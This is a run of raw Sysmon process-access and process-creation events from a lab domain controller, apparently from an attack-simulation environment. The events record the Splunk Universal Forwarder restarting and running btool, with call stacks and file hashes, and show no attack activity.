13:12:01.676{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4321-6000-A700-000000009A01}1156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4321-6000-A600-000000009A01}4240748C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{08A6967A-4321-6000-A700-000000009A01}1156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+146d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.679{08A6967A-4321-6000-A700-000000009A01}1156C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4321-6000-A600-000000009A01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2316 10341000x80000000000000003359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4321-6000-A600-000000009A01}4240C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4321-6000-A600-000000009A01}4240C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.660{08A6967A-4321-6000-A500-000000009A01}50044880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4321-6000-A600-000000009A01}4240C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d40f|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.667{08A6967A-4321-6000-A600-000000009A01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2316C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{08A6967A-4321-6000-A500-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2316 10341000x80000000000000003346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.644{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4321-6000-A500-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4321-6000-A500-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.629{08A6967A-4298-6000-3400-000000009A01}23163920C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4321-6000-A500-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+77c1aa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+b08def|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd792a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd534e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1a2a848|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.642{08A6967A-4321-6000-A500-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk 